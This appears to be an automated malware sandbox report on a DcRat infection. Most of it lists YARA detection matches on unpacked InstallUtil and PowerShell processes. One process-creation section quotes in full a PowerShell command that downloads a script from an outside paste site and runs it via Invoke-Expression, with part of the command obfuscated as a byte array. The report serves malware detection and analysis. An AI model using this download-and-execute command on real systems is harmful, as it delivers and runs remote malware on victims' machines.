Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1	Jump to behavior

Yara signature match

Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
